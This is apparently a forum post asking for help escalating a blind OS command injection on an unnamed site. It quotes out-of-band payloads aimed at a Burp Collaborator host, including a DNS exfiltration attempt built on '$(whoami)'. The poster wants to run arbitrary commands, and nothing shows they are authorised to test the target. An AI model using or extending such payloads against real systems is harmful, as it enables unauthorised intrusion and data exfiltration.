out-of-band data exfiltration Command Injection

[Deviandorex]

A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature

Issue: OS command injection Severity: High Confidence: Certain

the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.

These are the only commands it respond to.

nslookup xxx.burpcolaborator.com ping xxx.burpcolaborator.com sleep 10

other commands like nslookup $(whoami).xxx.burp collaborator.com They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.

I await your response. Thanx